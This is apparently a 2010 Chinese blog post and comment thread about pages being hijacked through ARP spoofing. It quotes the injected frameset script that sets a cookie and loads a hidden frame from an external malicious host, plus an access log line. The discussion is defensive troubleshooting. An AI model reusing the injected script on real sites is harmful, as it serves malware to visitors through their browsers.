又一个很郁闷的挂马现象 UpdatedPage=SW5qZWN0
我们自己所有的cache服务器都是做了ARP防护,绑定了路由的mac的.但是用户发现有挂马现象,源码被篡改(很像电信惯用的劫持那种形式),然后frame你的地址,用户回报源码如下:
<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf(“CK”);
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie=”CK=test;expires=”+EP.toGMTString();
self.hi.location=”http://safe47.best202.info:171/360/index.html?id=2000″;}
}
</script>
<frameset rows=”100%,*” onLoad=”showme()”>
<frame name=”hello” src=”/?UpdatedPage=SW5qZWN0″>
<frame name=”hi” src=”">
</frameset>
</html>
某段日志:
222.240.196.125 – - [13/May/2010:10:53:04 +0800] “GET /lrc145888.html?UpdatedPage=SW5qZWN0 HTTP/1.1″ 200 2735 ” http://www.1ting.com/lrc145888.html” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)”
你访问国之后就会自动添加参数/?UpdatedPage=SW5qZWN0,比如http://www.1ting.com/?UpdatedPage=SW5qZWN0,网上一搜?UpdatedPage=SW5qZWN0还很多,都没讲到原因和解决方案,好郁闷.求助.
Tags: 挂马
请问,这个问题最后如何解决的
我现在遇到了同样的问题,郁闷啊
直接让机房拔了恶意单向ARP的机器的线
唉,他们放了一台机器进去查3天了还没找到
我的机器有特殊原因又没法绑ARP,严重郁闷
有其他建议吗?
这个攻击,没有发送ARP,只有登录交换机,看CAM表才能看到,不带网管的交换机根本查不到.我遇到的这个只有在6点到8点
凌晨12点到上午9点放毒.
太感谢了,我先去试试
[...] This post was mentioned on Twitter by inso . inso said: 求助各位总, 又一个很郁闷的挂马现象,自动在URL后面添加 UpdatedPage=SW5qZWN0 详情: http://zhen.ta.ma.de.mei.tian.li/2010/05/2135/webmon-updatedpagesw5qzwn0 [...]